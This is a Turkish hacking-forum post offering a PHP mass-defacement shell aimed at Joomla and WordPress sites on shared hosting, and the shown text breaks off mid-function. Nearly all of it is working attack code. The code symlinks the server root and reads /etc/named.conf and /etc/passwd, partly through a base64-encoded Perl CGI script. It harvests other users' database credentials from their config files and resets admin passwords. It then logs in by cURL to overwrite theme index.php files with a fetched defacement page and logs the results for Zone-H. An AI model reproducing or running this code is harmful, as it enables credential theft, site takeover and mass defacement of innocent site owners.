Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Joomla ve WordPress Shelli
#1
Not => Sadece Joomla ve WordPress Sitelere Shell yedirebileceğiniz bir Shell türüdür. Çoğu Shelleri Joomla ve WP yemiyor maalesef.

Kod:
KingSkrupellos Cyberizm.Org İslami Teşkilat Ordusu

<?php
error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
}

function randomt() {
    $chars = "abcdefghijkmnopqrstuvwxyz023456789";
    srand((double)microtime()*1000000);
    $i = 0;
    $pass = '';
    while ($i <= 7) {
        $num = rand() % 33;
        $tmp = substr($chars, $num, 1);
        $pass = $pass . $tmp;
        $i++;
    }
    return $pass;
}

function index_changer_wp($conf, $content) {
    $output = '';
    $dol = '$';
    $go = 0;
    $username = entre2v2($conf,"define('DB_USER', '","');");
    $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
    $dbname = entre2v2($conf,"define('DB_NAME', '","');");
    $prefix = entre2v2($conf,$dol."table_prefix  = '","'");
    $host = entre2v2($conf,"define('DB_HOST', '","');");

    $link=mysql_connect($host,$username,$password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        $dol = '$';
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
    } else {
        $output.= "[-] DB Error<br />";
    }
    if($req1) {

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
        $data = mysql_fetch_array($req);
        $site_url=$data["option_value"];

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");
        $data = mysql_fetch_array($req);
        $template = $data["option_value"];

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");
        $data = mysql_fetch_array($req);
        $current_theme = $data["option_value"];

        $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
        $url2=$site_url."/wp-login.php";

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url2);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
        $buffer = curl_exec($ch);

        $pos = strpos($buffer,"action=logout");
        if($pos === false) {
$output.= "[-] Login Error<br />";
        } else {
$output.= "[+] Login Successful<br />";
$go = 1;
        }
        if($go) {
$cond = 0;
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);

$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Updated Successfuly<br />";
$hk = explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}
} else {
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);

$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
    $output.= "[-] Updating Index.php Error<br />";
} else {
    $output.= "[+] Index.php Template Updated Successfuly<br />";
    $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
    $cond = 1;
}
} else {
$output.= "[-] index.php can not load in Theme Editor<br />";
}
}
        }
    } else {
        $output.= "[-] DB Error<br />";
    }
    global $base_path;
    unlink($base_path.'COOKIE.txt');
    return array('cond'=>$cond, 'output'=>$output);
}

function index_changer_joomla($conf, $content, $domain) {
    $doler = '$';
    $username = entre2v2($conf, $doler."user = '", "';");
    $password = entre2v2($conf, $doler."password = '", "';");
    $dbname = entre2v2($conf, $doler."db = '", "';");
    $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
    $host = entre2v2($conf, $doler."host = '","';");
    $co=randomt();
    $site_url = "http://".$domain."/administrator";
    $output = '';
    $cond = 0;
    $link=mysql_connect($host, $username, $password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
        $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
    } else {
        $output.= "[-] DB Error<br />";
    }
    
    if($req1){
        if ($req) {
$req = mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];

$req = mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];

$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

if($return && $hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_REFERER, $url2);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if($pos){
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);

$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
$output.= "[+] index.php file found in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<dd class="message message">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
  
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
        }
        else {
$req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

if($hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}

if($pos) {
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if($hidden2) {
$output.= "[+] index.php file founded in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}

if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<dd class="message message fade">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
        }
    } else {
        $output.= "[-] DB Error<br />";
    }
    global $base_path;
    unlink($base_path.$co);
    return array('cond'=>$cond, 'output'=>$output);
}

function exec_mode_1($def_url, $hacker) {

    @mkdir('sym',0777);
    $wr  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $fp = @fopen ('sym/.htaccess','w');
    fwrite($fp, $wr);
    @symlink('/','sym/root');
    $dominios = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
    $out[1] = array_unique($out[1]);
    $numero_dominios = count($out[1]);
    echo "Total domains: $numero_dominios <br><br />";
    $def = file_get_contents($def_url);
    $def = urlencode($def);
    $dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5uZXQvZGVmYWNlZC8yMDEzLzAxLzEzL2JhbHRzdHVkaW8ubHQvaW5kZXguaHRtbCcpOw0KJHAgPSBleHBsb2RlKCdwdWJsaWNfaHRtbCcsZGlybmFtZShfX0ZJTEVfXykpOw0KJHAgPSAkcFswXS4ncHVibGljX2h0bWwnOw0KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG1sJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5waHAnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEBmb3BlbigkcC4nL2luZGV4Lmh0bScsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICBlY2hvICdEb25lJzsNCn0NCmNsb3NlZGlyKCRoYW5kbGUpOw0KdW5saW5rKF9fRklMRV9fKTsNCj8+';
    $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
    $output = fopen('defaced.html', 'a+');
    $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
    $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
    for($i = $st; $i <= $numero_dominios; $i++)
    {
        $domain = $out[1][$i];
        $dono_arquivo = @fileowner("/etc/valiases/".$domain);
        $infos = @posix_getpwuid($dono_arquivo);
        
        if($infos['name']!='root') {
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");

$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}

if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config03 && preg_match('/DB_NAME/i',$config03)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config03, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {    
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($_SESSION['count1']+$_SESSION['count2'] > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
function exec_mode_2($def_url) {
    
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    print("Total domains: $num<br><br />");
    
    $def = file_get_contents($def_url);
    $def = urlencode($def);
      
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
           NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
           h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
           G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
           YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
           kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
           B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
    mkdir('plsym',0777);
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    unlink('plsym/plsym.cc');
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    unset($match[1][0]);
    $i = 1;
    foreach($match[1] as $m)    
    {
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }

        if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($count1+$count2 > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}

function exec_mode_3($def_url) {
    
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    print("Total domains: $num<br><br />");
    
    $def = file_get_contents($def_url);
    $def = urlencode($def);
      
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
           kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
           VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
           3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
           cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
           MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
           R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
    mkdir('plsym',0777);
    file_put_contents('plsym/data.txt', $_POST['man_data']);
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    unlink('plsym/plsym.cc');
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    unset($match[1][0]);
    $i=1;
    foreach($match[1] as $m)    
    {
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }

        if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
